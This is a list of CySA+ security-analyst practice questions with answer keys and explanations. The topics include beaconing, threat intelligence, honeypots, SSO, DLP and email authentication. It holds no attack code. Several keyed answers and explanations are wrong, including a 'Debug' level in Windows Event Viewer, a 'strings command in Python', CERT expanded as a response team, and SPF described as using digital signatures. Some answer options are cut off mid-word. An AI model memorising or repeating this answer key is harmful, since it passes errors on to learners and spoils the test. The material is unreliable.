CySA+ Modules
A security analyst notices anomalous network activity on a system. A user's computer is communicating with a command and control (C2) server. Which of the following concepts are relevant to the security analyst's investigation into the compromised system? (Select the two best options.) A. Beaconing B. Malicious processes C. Malware installation D. Data encryption
A. Beaconing B. Malicious processes A compromised system sends a beacon signal to a C2 server to signal its availability or receive new commands. The security analyst needs to identify the specific malicious processes running on the system to determine the extent of the compromise and the actions the analyst must take to remediate the situation.
Which of the following operations is characteristic of cyber criminal activity? A. Targeting multiple pharmaceutical companies with a financial fraud scheme B. Stealing information about planned U.S. troop deployments C. Releasing embarrassing personal information about the heads of several non-governmental organizations D. Defacing the website of a prominent international oil company
A. Targeting multiple pharmaceutical companies with a financial fraud scheme Organized crime describes a category of malicious activity characterized by the desire to generate illicit profit. Frequently, the activity involves financial fraud and blackmail and normally targets companies and private citizens.
An analyst identifies a script on a compromised workstation. The analyst determines that the author has used meaningful opening and closing tags to identify data types. What scripting language is the analyst examining? A. XML B. HTML C. PowerShell D. OSINT
A. XML eXtensible Markup Language (XML) is a text-based scripting language that transfers data. An important differentiator of XML is that the language does not define the data tags; those are user-defined.
Which of the following show how system and network architecture concepts are related to security operations? (Select the three best options.) A. Zero trust B. Cloud access security broker (CASB) C. Secure access service edge (SASE) D. Firewall rules alone
A. Zero trust B. Cloud access security broker (CASB) C. Secure access service edge (SASE) System and network architecture concepts are vital in security operations. Zero trust emphasizes network segmentation and access control to limit access to sensitive resources, reducing the attack surface. CASB technology offers comprehensive protection for cloud-based resources by enabling visibility into cloud usage, enforcing access control policies, and providing advanced threat protection to mitigate risks associated with cloud-based services. SASE combines network security, access control, and wide area network (WAN) capabilities to secure networks and ensure authorized access to critical resources.
What is the main benefit of using software-defined networking (SDN) in a virtualized environment? A. Increased network security B. Increased ease of management C. Improved network performance D. Reduced hardware costs
B. Increased ease of management SDN allows for increased ease of management in a virtualized environment. It separates the control and data planes of traditional network devices, enabling the centralization and programmability of network management functions. This centralized approach to network management allows for greater control over network resources and provides a more dynamic and scalable environment.
An organization's network defense team leverages a variety of offensive techniques as defensive measures to stop active attacks while continuing to gain an understanding of adversary behavior. What type of network defense are they engaging in? A. IoCs B. Threat hunting C. Active defense D. Risk management
C. Active defense Active defense describes the adaptation of offensive techniques for network defense purposes. Honeypots are an example of active defense.
A user alerts the incident response team to an email that comes from a domain very similar to the company's legitimate domain. What appears to have been used in this attempted impersonation? A. Reverse shell B. Single pane of glass C. Webhook D. Cousin domain
D. Cousin domain A cousin domain is a domain very similar to a legitimate domain. For example, "example.trainingteam.com" is a cousin domain to "example.com."
A security analyst is writing a script to automate security operations. However, the analyst is confused about which data format to use for the script: JSON or XML. Which data format should the analyst use for the script? A. XML B. TXT C. CSV D. JSON
D. JSON JavaScript Object Notation (JSON) is the preferred data format for scripting and automation tasks in security operations. JSON is lightweight, easy to parse, and widely supported. It is commonly used for exchanging data between web applications and provides better performance and flexibility compared to XML.
The system administrator of a large organization notices abnormal account activity and a high volume of outbound traffic to a suspicious IP address from a client machine. Which of the following best describes the abnormal account activity in this scenario? A. The use of weak passwords and poor authentication mechanisms B. The use of administrator-level accounts C. A user accessing multiple resources in a short period of time D. Unusual user account behavior, such as logging in at unusual times or from unusual locations
D. Unusual user account behavior, such as logging in at unusual times or from unusual locations The abnormal activity may involve changes in login times, accessing files or systems not typically accessed, or altering security settings.
A security analyst notices that the processor consumption on the organization's server is much higher than usual. After investigating, a process named "malware.exe" was found running in the background. Which of the following best describes the relationship between processor consumption and malicious processes in this scenario? A. Malicious processes can cause high processor consumption. B. High processor consumption always indicates the presence of malicious processes. C. Low processor consumption always indicates the absence of malicious processes. D. Malicious processes have no impact on processor consumption.
A. Malicious processes can cause high processor consumption. A system infected with malware may execute malicious processes that can consume a significant amount of processing power. High processor consumption is often an indicator of malicious processes actively running on a system. Therefore, identifying and stopping such processes is crucial to preventing further damage and ensuring the security of the system.
A security organization is concerned about employees connecting rogue equipment to the network. What could they use to identify rogue devices? A. Use a map scan B. Create a honeypot C. Consult paid feeds D. Take memory dumps
A. Use a map scan A map scan, also known as a discovery scan, identifies devices connected to a network. Security organizations frequently use these scans to identify rogue devices.
Which of the following sources are potential sources of offensive open-source intelligence (OSINT)? (Select the three best options.) A. Blogs and social media B. HTML code C. Government bulletins D. Metadata
A. Blogs and social media B. HTML code D. Metadata Blogs and social media are potential sources of open-source intelligence (OSINT). Employee blogs often contain information valuable to an attacker, including pattern-of-life data, contact information, or details relating to social engineering. A document's metadata may contain hidden information an organization does not intend to reveal, such as the names of its author and editors. HTML code can reveal sensitive information such as internal IP addresses, file paths, the names of sensitive servers, or software versions.
A security analyst is looking for the appropriate tools to detect and analyze malware in the organization's network. What tools allow the analyst to detect and analyze malware through virtualized environments? (Select the two best options.) A. Cuckoo Sandbox B. Joe Sandbox C. VirusTotal D. Snort
A. Cuckoo Sandbox B. Joe Sandbox Cuckoo Sandbox is a powerful open-source malware analysis system that automatically analyzes and detects malicious files and URLs in a virtualized environment. Joe Sandbox is a commercial malware analysis system that offers advanced malware analysis capabilities such as code analysis, behavior analysis, and memory analysis in a virtualized environment.
Which of the following logging levels is the highest and most verbose level of logging in Windows Event Viewer? A. Debug B. Warning C. Information D. Error
A. Debug Debug is the highest level of logging in Windows Event Viewer, providing the most verbose output for troubleshooting purposes by providing detailed information about a software application or system process.
A threat hunter is searching for malicious activity on a corporate network. Which of the following might they use to guide their efforts? (Select the two best options.) A. Log files B. Memory dumps C. IoCs D. IoAs
C. IoCs D. IoAs Indicators of compromise (IoCs) suggest a compromise may have occurred, such as communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Indicators of attack (IoAs) identify an ongoing attack. These sometimes include specific network traffic, user account creation, and particular log activity.
An analyst at a financial services company is conducting a review of several threat intelligence providers. If the analyst wants to ensure they can filter reports by industry, they are likely concerned about what attribute of threat intelligence? A. Timeliness B. Accuracy C. Open source D. Relevancy
D. Relevancy Relevancy refers to the usefulness of a piece of information concerning a specific threat. Relevant information is actionable and gives an organization meaningful context. Filtering information by the appropriate industry increases its relevancy.
A company is implementing a new authentication system that uses passwordless and SSO capabilities. During the rollout, the IT team notices some employees are having trouble accessing certain applications and resources, while others are experiencing no issues. Upon investigation, the team discovers that some applications and resources are not compatible with the new system. What is the best course of action for the IT team to take in response to this issue? A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system B. Contact the vendors of the incompatible applications and resources to see if they have updates that will make them compatible with the new system C. Notify all employees to use their previous login credentials until the incompatible applications and resources are updated D. Ignore the issue and allow some employees to be unable to access certain applica
A. Immediately roll back the passwordless and SSO authentication system and revert to the previous system Immediately rolling back the passwordless and SSO authentication system and reverting to the previous system is the best option because it will restore the system to the previous state in which all employees could access all applications and resources.
A security analyst monitoring a network for any irregularities notices a significant increase in beaconing and irregular peer-to-peer communication on one of the company's servers. Which of the following best describes the potential threat of this situation? A. Malware propagation and system compromise B. Data exfiltration and infiltration C. Phishing and spear-phishing attacks D. Privilege escalation and credential theft
A. Malware propagation and system compromise Beaconing is an irregular communication pattern in which a device sends repeated signals or messages to a command and control (C&C) server to establish a connection. Irregular peer-to-peer communication is the communication between two devices that are not typically in direct contact with each other, and it can indicate a lateral movement of malware between endpoints.
After discovering malicious activity on a network, what artifacts might a threat hunter analyze to identify additional indicators of compromise (IoCs)? (Select the three best options.) A. Memory dumps B. Network traffic C. Paid feeds D. Log files
A. Memory dumps B. Network traffic D. Log files Log files are records of events on a given system. Threat hunters develop indicators of compromise (IoCs) based on specific events found in the logs. Memory dumps are records of the information contained in RAM. They can provide valuable information about running processes that may not be available anywhere else. Network traffic is the information transiting a network. Monitoring it for specifically formatted information can help identify malicious activity.
Which of the following is a common method for protecting cardholder data and PII? A. Default system configurations B. Encryption technology C. Single-factor authentication D. Data retention policies
B. Encryption technology Encryption technology protects sensitive information such as cardholder data and personally identifiable information (PII). It is crucial to implement appropriate security measures to safeguard sensitive information through data encryption, access control, and security awareness training for employees.
Which of the following is a potential security risk associated with implementing a single sign-on (SSO) solution in a security operations environment? A. Increased complexity of authentication process B. Increased risk of phishing attacks C. Incompatibility with multi-factor authentication (MFA) D. Greater reliance on physical devices for authentication
B. Increased risk of phishing attacks SSO can be convenient for users and help improve productivity, but it can also make it easier for attackers to gain access to multiple systems or applications if they can successfully steal or phish a single set of login credentials.
An analyst is reviewing logs and notices unusual traffic spikes and activity on unexpected ports. Further investigation reveals that the traffic originates from a group of servers on the network. What is the best course of action for the analyst to take in response? A. Ignore the unusual activity as it may be a false positive or a normal activity B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures C. Shut down the affected servers and restore them from the most recent backup D. Deploy additional network monitoring tools to investigate the source of the traffic
B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures To prevent the further spread of the attack and minimize the impact of the incident, the analyst should disconnect the affected servers from the network and initiate incident response procedures.
A security analyst for a corporation notices abnormal OS process behavior and unauthorized changes in the network environment. The analyst reviews the logs and identifies suspicious activities on a server. The analyst could have implemented which security operations practice to prevent the incident from happening in the first place? A. Incident response procedures to quickly detect and respond to security incidents B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them C. User access control policies to limit access to sensitive systems and data D. Regular system backups to quickly restore systems and data in the event of a compromise
B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them The analyst should conduct regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them. When the analyst can identify and remediate vulnerabilities, attackers will have more difficulty exploiting systems and software.
A company's security operations center has implemented a data loss prevention (DLP) solution to monitor and prevent sensitive data from being transmitted outside the organization. The security team also maintains strict controls over cardholder data (CHD) and personally identifiable information (PII) to comply with industry regulations and protect customer privacy. Which of the following is a potential benefit of implementing a DLP solution in a security operations environment? A. A DLP solution can provide physical security for servers and network devices, protecting against theft or damage. B. A DLP solution can automatically detect and remediate vulnerabilities in software and hardware components. C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. D. A DLP solution can provide real-time threat intel
C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. DLP can help identify and prevent unauthorized access, transmission, and storage of sensitive data such as cardholder data and personally identifiable information.
A security analyst analyzes application logs to identify any suspicious activities and notices that one of the company's recently resigned employees had downloaded a large amount of data just before leaving. What is the analyst's most appropriate next step based on the scenario? A. Block the former employee's access to the company's server to prevent further data exfiltration B. Notify the authorities and report the incident to prevent further data theft C. Check the company's firewall logs to identify any external connections made by the former employee D. Review the network's DNS logs to identify any unusual connections to external domains
C. Check the company's firewall logs to identify any external connections made by the former employee Checking the company's firewall logs will help the analyst identify any external connections made by the former employee, which can indicate whether the former employee has shared company data with external parties.
A threat hunter is searching for malicious activity with information derived from the research of a third-party commercial entity. What kind of information is the threat hunter likely using? A. Internal sources B. OSINT C. Paid feed D. ISACs
C. Paid feed A paid feed, also referred to as a commercial feed, is a source of cyber threat intelligence developed using the research and analysis of a private commercial entity.
A security analyst is developing a Python script to analyze regular text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concept the analyst needs to implement in the Python script to detect obfuscated text? (Select the two best options.) A. Polymorphic code B. Cryptography C. Regular expression D. String manipulation
C. Regular expression D. String manipulation The user can utilize regular expressions to detect patterns in text, which can help identify potential security incidents. The user can utilize string manipulation to modify strings, which is helpful in analyzing obfuscated text.
A cybersecurity analyst is investigating a potential phishing attack against one of their clients and finds an email with an attachment and a long string of characters the analyst does not recognize. What is this long string of characters? A. A public key B. A private key C. An encrypted password D. A hash value
D. A hash value Hashing is the process of transforming data into a unique fixed-length string of characters representing the original data to ensure any change to the original data will result in a different hash value, thereby verifying the integrity of the data.
Which of the following provides cybersecurity information and services to the owners and operators of critical infrastructure? A. OSINT B. CSIRT C. Threat hunting D. ISACs
D. ISACs Information Sharing and Analysis Centers (ISACs) provide cybersecurity information and services to the owners and operators of critical infrastructure. They are a forum for exchanging information between the public and private sectors to ensure the protection of vital assets.
A security analyst responsible for carrying out security operations on a company's network has received reports of certain users experiencing issues with their device's slow performance and high memory consumption. Which of the options is a probable cause of the high memory usage and slow performance? A. Running multiple applications at the same time B. Running outdated operating system software C. Having insufficient disk space on the device D. Installing software from unverified sources
D. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to users experiencing issues with their device's slow performance and high memory consumption.
A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change? A. System log B. Event log C. Application log D. Security log
C. Application log The application log provides information about the application's internal functions and operations, including any unauthorized changes.
What do serverless, cloud, hybrid, and on-premises environments all use in security operations? (Select the three best options.) A. Access control mechanisms B. Security frameworks C. Incident response procedures D. Reduced attack surface
A. Access control mechanisms B. Security frameworks C. Incident response procedures Serverless, cloud, hybrid, and on-premises environments all need access control mechanisms to restrict unauthorized access to any sensitive data or systems. Security frameworks will provide a structured approach to security risk management. Developing incident response procedures is crucial for effectively managing security incidents to minimize damages and potential risks.
A security analyst for a large financial institution notices abnormal OS process behavior, unauthorized changes, and file system changes occurring on one of the company's servers. The analyst believes there may be a security breach. What is the best way to confirm the analyst's suspicions of a breach? A. Check the system logs for unusual activity B. Conduct a full system backup to ensure that data is not lost C. Ask all employees who have access to the server if they made any changes D. Shut down the server immediately to prevent further damage
A. Check the system logs for unusual activity System logs record all activity on a server, including processes and file changes, which makes it an excellent resource for detecting security breaches.
A security analyst notices abnormal account activity in the company's system. Someone accessed the system with the CEO's credentials at 2:00 am from a location 500 miles away from the CEO's usual location. The analyst tracks the IP address, GPS address, and device that accessed the system. Which security operation technique did the analyst use to determine the location and device of the user who accessed the system? A. Digital forensics B. Log analysis C. Alert triage D. Threat hunting
A. Digital forensics The security analyst tracked the GPS address, IP address, and device the attacker used to determine their location, which is an example of using digital forensics to investigate the incident.
The Department of Homeland Security announces a binding operational directive for federal agencies. This is an example of what? A. Government bulletins B. CERT C. MITRE ATT&CK D. Metadata
A. Government bulletins Government bulletins contain information and advice related to defending against cyber threats. A binding operational directive is a government bulletin that contains guidance federal agencies must implement.
What are the advantages of implementing single sign-on (SSO) technology for an organization's authentication process? (Select the two best options.) A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices C. Eliminating the need for multi-factor authentication (MFA) D. Providing an additional layer of security through the use of biometric authentication
A. Improving user experience by reducing the need for multiple logins and passwords B. Enabling passwordless authentication through the use of smart cards or mobile devices Single sign-on (SSO) technology enhances security and simplifies access management by allowing users to authenticate to multiple applications or systems with a single set of credentials, thereby reducing the need for multiple logins and passwords. Passwordless authentication via SSO further improves security by using more secure methods like smart cards or mobile devices.
A company realizes that an attacker has persistent access to several internal servers. What team is best prepared to react to this? A. Threat hunters B. Hacktivists C. CSIRT D. General counsel
C. CSIRT Computer security incident response team (CSIRT) is a group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.
An organization considers increasing threat intelligence sharing. Which parts of the organization are likely to experience direct benefits from this increased intelligence sharing? (Select the three best options.) A. Incident response B. The general counsel C. Risk management D. Security engineering
A. Incident response C. Risk management D. Security engineering Incident responders can benefit from the sharing of tactics, techniques, and procedures (TTPs) and can learn valuable lessons from the experiences of other incident response teams. Risk management is a program designed to identify risks and develop strategies to minimize their impact on an organization. Threat intelligence helps organizations make more informed risk decisions. Security engineers can adapt their security solutions to new and innovative TTPs used by malicious actors, increasing their effectiveness against the types of techniques attackers use.
A security analyst at a large financial institution monitors network traffic for any unusual activity. The analyst notices an unusual spike in network traffic occurring on an unexpected port, indicating possible malicious activity. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly
A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.
While monitoring the network traffic of a large financial institution, a security analyst notices an unusual pattern of outgoing traffic occurring on an unexpected port. Which of the following actions should the analyst take in response to this anomalous activity? (Select the two best options.) A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity C. Immediately block traffic on the unexpected port D. Monitor the activity for a longer period to confirm that it is not simply a temporary anomaly
A. Investigate the traffic to determine its source and destination B. Alert the manager and other relevant parties about the anomalous activity Investigating the traffic to determine its source and destination is essential to understanding the nature of the anomalous activity. Alerting the manager and other relevant parties about anomalous activity is critical in ensuring a swift and coordinated response to any potential security threats.
During a digital forensic analysis, an analyst may generate what kinds of useful information? (Select the three best options.) A. IoCs B. Vulnerabilities C. Misconfigurations D. OSINT
A. IoCs B. Vulnerabilities C. Misconfigurations Indicators of Compromise (IoCs) are items that suggest a compromise may have occurred. These can include communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Vulnerabilities are flaws in a system, software, or device that weaken security and present an opportunity for exploitation. Misconfigurations are deviations from required configuration standards. Misconfigurations create an opportunity for exploitation.
A security analyst at a large financial institution has recently noticed an increase in unexpected outbound communication and is concerned about potential data exfiltration. Which of the following actions should the analyst take to address this? (Select the three best options.) A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems D. Block all outbound traffic from the organization's network to mitigate data loss during the investigation
A. Monitor network traffic for any suspicious outbound connections B. Implement network segmentation to prevent lateral movement by attackers C. Check for any malware or malicious software on the organization's systems Monitoring network traffic is essential in detecting suspicious outbound connections because the analyst can identify any unusual outbound traffic patterns and investigate further. Implementing network segmentation can prevent lateral movement by attackers and limit their ability to access sensitive data. Checking for malware or malicious software on the organization's systems is also crucial in identifying any malicious activity causing unexpected outbound communication.
A project manager needs to verify users and authorize access to systems and applications. Which security control should the project manager implement? A. Multi-factor authentication B. Firewall C. Access control list D. Password manager
A. Multi-factor authentication Implementing multi-factor authentication (MFA) is the most appropriate security control to ensure user authentication and authorization for accessing required systems and applications. MFA uses multiple authentication methods such as passwords, biometrics, or token-based authentication to enable only authorized users to access the systems and applications.
A network engineer is gathering requirements from a security operations center (SOC) analyst. Which of the following requirements might lead the engineer to suggest deploying a honeypot? (Select the two best options.) A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. C. The organization needs to minimize human interaction through orchestration. D. Analysts need the ability to code in XML.
A. Network defenders need the ability to observe attacks on the network. B. The organization needs to regularly develop new indicators of compromise (IoCs) and indicators of attack (IoAs) based on the attacks they are experiencing. A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources. Indicators of compromise (IoCs) are items that suggest a compromise may have occurred. Indicators of attack (IoAs) are items that can identify an ongoing attack.
A security researcher identifies a financial fraud scheme targeting multiple pharmaceutical companies. What type of actor is most likely responsible for this activity? A. Organized crime B. Nation state C. Hacktivists D. Script kiddie
A. Organized crime Organized crime refers to malicious activity characterized by the generation of illicit profit. Frequently, this activity involves financial fraud and blackmail.
A large financial institution is considering passwordless authentication and SSO as part of a new incident response and management plan to improve security and streamline operations. Which of the following is true about passwordless authentication and SSO in incident response and management? A. Passwordless authentication and SSO can help reduce incident response and management time. B. Passwordless authentication and SSO are not suitable for incident response and management as they create additional security risks and complexities. C. Passwordless authentication and SSO are only useful for small organizations with limited security needs. D. Passwordless authentication and SSO can only be used for incident response and management in large organizations.
A. Passwordless authentication and SSO can help reduce incident response and management time. Passwordless and single sign-on (SSO) are two authentication technologies frequently used in incident response and management. Incident response and management involve handling cybersecurity incidents in a systematic manner, including detection, analysis, containment, eradication, and recovery.
Which of the following concepts related to security operations involves the use of digital certificates to establish trust between entities and secure communication channels? A. Public key infrastructure (PKI) B. Single sign-on (SSO) C. Intrusion detection system (IDS) D. Firewall
A. Public key infrastructure (PKI) PKI is a framework that enables secure communication by using digital certificates to authenticate and establish trust between entities. Secure Sockets Layer (SSL) is a protocol that uses PKI to secure communication channels such as web traffic.
What are the benefits of network segmentation in security operations, specifically in relation to system and network architecture concepts and operating system (OS) concepts? (Select the two best options.) A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity C. Increasing network performance by reducing network congestion D. Enabling easier access to resources across different network segments
A. Reducing the attack surface by limiting access to sensitive resources B. Allowing for more effective monitoring of network traffic and detection of anomalous activity Network segmentation is a security practice that divides a network into smaller, isolated segments, reducing the attack surface by limiting access to sensitive resources. Network segmentation enables more effective monitoring of network traffic and detection of anomalous activity, making it easier for security teams to identify and respond to potential threats.
A security analyst discovers that unauthorized privileges have been granted to a new account that was created with high-level access, which was not authorized by the security team. Which of the following is the most effective way to prevent the introduction of new accounts with unauthorized privileges in an organization's environment? A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts B. Use strong passwords and enforce password policies to prevent unauthorized access to user accounts C. Block access to the organization's network from external sources to prevent attacks and data breaches D. Implement a firewall to monitor all incoming and outgoing network traffic to identify suspicious activity
A. Regularly review and audit user accounts to identify and disable any unused or unneeded accounts Regularly reviewing and auditing user accounts identifies accounts that should be disabled, have been compromised, and have been granted unauthorized access privileges to the organization's systems.
A cybersecurity analyst has noticed an increase in suspicious activity on the network. They consider implementing a security information and event management (SIEM) solution and endpoint detection and response (EDR) solution to help identify and respond to potential threats. What is a potential benefit of implementing both a SIEM and EDR solution in a security operations environment? A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. B. SIEM can provide in-depth analysis of endpoint activity, while EDR can identify and prevent malicious network traffic from entering the network. C. SIEM can identify and prevent malware from infecting endpoints, while EDR can monitor and report on network activity to identify potential threats. D. SIEM can prevent unauthori
A. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats. SIEM can monitor and correlate events across multiple systems to identify potential security incidents, while EDR can provide deep visibility into endpoint activity to detect and respond to advanced threats.
An analyst needs to use Nmap to identify workstations with a specific service running on port 8080. What type of script would be best for automating this task? A. Shell script B. XML C. APT D. CSIRT
A. Shell script Shell scripts are best for automating complicated tasks. They easily automate software updates, assist with log review, and run Nmap scans.
A cybersecurity specialist is checking a link to a news article within a colleague's email. The email appears to be genuine, but the link is deliberately obscured. The specialist suspects that the link may be part of a social engineering attack that aims to exploit the organization's security vulnerabilities. What is the role of obfuscated links in social engineering attacks and their impact on IT security operations? (Select the three best options.) A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. D. Obfuscated links a
A. Social engineering attacks rely on human interaction to trick individuals into revealing sensitive information or performing actions that compromise network security. B. Obfuscated links are hyperlinks intentionally obscured to hide the true destination of the link, often used in phishing attacks. C. Social engineering attacks often use obfuscated links to redirect users to malicious websites that install malware or steal login credentials. Social engineering attacks rely on the exploitation of human vulnerabilities, such as trust and curiosity, to gain unauthorized access to sensitive information or networks. Attackers often use obfuscated links in social engineering phishing attacks to trick users into clicking a link that leads to a fake website designed to steal personal information. Attackers also use obfuscated links in social engineering attacks to redirect users to malicious websites that can infect their devices with malware or steal login credentials.
A security analyst for a large financial institution investigates a suspicious IP address that their security system flagged. The analyst finds two useful resources, WHOIS and AbuseIPDB. Which of the following best describes the role of WHOIS and AbuseIPDB in security operations? A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. B. WHOIS and AbuseIPDB block malicious traffic from entering a network. C. WHOIS and AbuseIPDB encrypt sensitive data to prevent unauthorized access. D. WHOIS and AbuseIPDB monitor the network for potential vulnerabilities.
A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. WHOIS is a publicly available database that provides information about the owners of registered domain names, IP addresses, and autonomous system numbers. AbuseIPDB is a community-driven project that collects and shares data about IP addresses reported for abusive behavior.
A security analyst is investigating a potential security breach in the company's network. The analyst is using Wireshark and tcpdump to analyze the network traffic and detect any suspicious activity. Which tool can be used to view the network packets in real time and analyze them using a graphical user interface, while the other tool captures network packets and displays them in a text-based format? A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. B. Wireshark and tcpdump are both command-line tools the analyst can use for network analysis. C. Wireshark and tcpdump are both graphical user interface tools the analyst can use for network analysis. D. Tcpdump is a graphical user interface tool, while Wireshark is a command-line tool.
A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. The analyst can utilize Wireshark, a graphical user interface tool, to view network packets in real time and analyze them in a user-friendly way.
Which of the following is an example of cardholder data (CHD)? A. A customer's name and email address B. A customer's credit card number and expiration date C. A customer's social security number D. A customer's mother's maiden name
B. A customer's credit card number and expiration date Personally identifiable information (PII) related to credit cards or payment cards is cardholder data. It includes sensitive information such as card numbers, expiration dates, and security codes. It is important to ensure that any system that handles cardholder data is secure to prevent data breaches and protect the privacy of customers.
Network defenders realize they are learning valuable information about attackers each time a host is compromised. They want to preserve the ability to gain these insights without risking sensitive information. What tool or technique could the network defenders implement to accomplish this goal? A. Threat hunting B. A honeypot C. A SIEM D. Paid threat feeds
B. A honeypot A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources.
While reviewing alerts, an analyst notices a new signature is generating a high volume of false positives. This appears to be the result of an error in the way the signature is written. This represents an issue with what attribute of threat intelligence? A. Relevancy B. Accuracy C. Timeliness D. Reconnaissance
B. Accuracy Accuracy describes the correctness of threat intelligence. Accurate information is free of errors and biases.
A security analyst at a large financial institution monitors the network for any suspicious activity and finds a log file that appears to have been tampered with. Using the strings command in Python, what will the analyst be able to extract? A. Only strings that are visible to the user B. Both strings and binary data C. Only binary data D. Only numerical data
B. Both strings and binary data The strings command in Python extracts human-readable strings from binary data to obtain text from executable files and extracts data from log files.
A threat-hunting team is looking for unusual traffic and anomalous attempts to access the company's essential servers, databases, and applications. This is an example of what focus area? A. Misconfiguration hunting B. Business-critical asset hunting C. Isolated network hunting D. Indicators of compromise hunting
B. Business-critical asset hunting Business-critical asset hunting is when an organization identifies its business-critical systems and conducts a threat hunt designed to uncover unusual traffic and anomalous attempts to access those systems.
Which of the following might help a company coordinate the response to a cyberterrorist attack? (Select the two best options.) A. MITRE ATT&CK B. CERT C. OSINT D. CSIRT
B. CERT D. CSIRT Computer security incident response team (CERT) is a group tasked with mitigating and minimizing the impact of malicious activity. They coordinate across multiple organizations to ensure an effective response to major incidents. Computer security incident response team (CSIRT) is a group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.
Which statement best explains the importance of cloud system and network architecture concepts in security operations as they relate to hybrid and on-premises systems? A. Cloud system and network architecture concepts are only useful for securing cloud-based systems. B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. C. Cloud system and network architecture concepts are important for securing on-premises systems, not hybrid systems. D. Cloud system and network architecture concepts are not important for securing hybrid or on-premises systems.
B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. Knowledge of cloud system and network architecture concepts is essential for securing both hybrid and on-premises systems.
A security analyst discovers that an attacker is attempting to launch a distributed denial-of-service (DDoS) attack on the company's network. What action should the security analyst take to prevent the DDoS attack from succeeding? A. Implement a firewall to block traffic from the attacker's IP address B. Configure the router to limit the amount of traffic coming from the attacker's IP address C. Add more bandwidth to the server to handle the increased traffic D. Shut down the server until the attacker is identified
B. Configure the router to limit the amount of traffic coming from the attacker's IP address The security analyst should configure the router to limit the amount of traffic coming from the attacker's IP address. This will prevent the attacker from overwhelming the company's server with traffic.
The IT team at a company wants to implement additional security measures to prevent recent phishing attempts against their employees. The team will use Domain-based Message Authentication, Reporting and Conformance (DMARC), Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) to secure the email system. Which of the following statements is true regarding DMARC, SPF, and DKIM in the context of email security operations? A. DMARC, SPF, and DKIM are all email security protocols that use encryption to protect emails from phishing attempts. B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. C. DMARC, SPF, and DKIM are all email security protocols that use machine learning to detect and block spam emails. D. DMARC, SPF, and DKIM are all email security protocols that use firewalls to prevent unauthorized access to emails.
B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. Domain-based Message Authentication, Reporting, and Conformance (DMARC) validates the authenticity of the sender's domain, while Sender Policy Framework (SPF) verifies that the message comes from an authorized IP address. DomainKeys Identified Mail (DKIM) adds a digital signature to the email to verify its integrity. Together, they help prevent phishing attacks and ensure the safety and security of email communication.
A cybersecurity analyst develops a new security protocol that utilizes hashing and headers to enhance the security of the company's data transmissions. Which of the following correctly explains the role of hashing and headers in enhancing security operations? A. Hashing and headers encrypt data transmissions. B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. C. Hashing and headers decrypt data transmissions. D. Hashing and headers are not related to enhancing security operations; they only format and organize data.
B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing generates a unique, fixed-length, irreversible digital representation of data. Headers are pieces of metadata added to a message or data packet that include information such as sender and recipient information, data type, and various other parameters that help to route and manage the transmission of data.
During a log review, an incident responder discovers that a network administrator sent a sensitive file containing company financial data to their personal email account on the same day they resigned. This is likely an example of what? A. Unintentional insider B. Intentional insider C. Script kiddie D. OSINT collection
B. Intentional insider An intentional insider is a trusted individual who knowingly and intentionally conducts or facilitates malicious activity against an organization.
